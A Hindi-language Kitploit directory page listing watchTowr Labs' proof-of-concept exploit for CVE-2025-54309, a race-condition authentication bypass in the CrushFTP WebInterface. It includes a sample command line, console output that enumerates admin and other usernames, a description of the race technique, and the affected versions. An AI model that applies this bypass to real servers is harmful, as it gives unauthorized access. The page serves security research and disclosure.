Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — CVE-2025-54309 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो CrushFTP WebInterface में रेस कंडीशन के माध्यम से ऑथेंटिकेशन बायपास का प्रदर्शन करता है ताकि उपयोगकर्ताओं को एन्यूमरेट किया जा सके। | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

CVE-2025-54309 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो CrushFTP WebInterface में रेस कंडीशन के माध्यम से ऑथेंटिकेशन बायपास का प्रदर्शन करता है ताकि उपयोगकर्ताओं को एन्यूमरेट किया जा सके।

रिपॉजिटरी देखें
28321 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-54309

CrushFTP प्रमाणीकरण बाईपास प्रूफ ऑफ कॉन्सेप्ट

तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें

कार्रवाई में पहचान

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

विवरण

यह स्क्रिप्ट CrushFTP इंटरफेस के लिए CVE-2025-54309 की अवधारणा का प्रमाण है। समान सत्र पहचानकर्ताओं को साझा करने वाले रेस अनुरोधों का एक सेट बनाकर, एक अनुरोध username प्रॉपर्टी को "crushadmin" पर सेट करने के लिए और एक अनुरोध इस उपयोगकर्ता के रूप में एक प्रमाणित कमांड निष्पादित करने के लिए, इस PoC में उपयोगकर्ता नामों की सूची निकालना संभव है। अधिक विवरण हमारे [ब्लॉग पोस्ट] (https://labs.watchtowr.com/) में वर्णित हैं।

प्रभावित संस्करण

  • 10.8.5 से पहले
  • 11, 11.3.4_23 से पहले

अधिक जानकारी के लिए CrushFTP सलाह देखें

अनुसरण करें watchTowr Labs

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
टूल डाउनलोड करें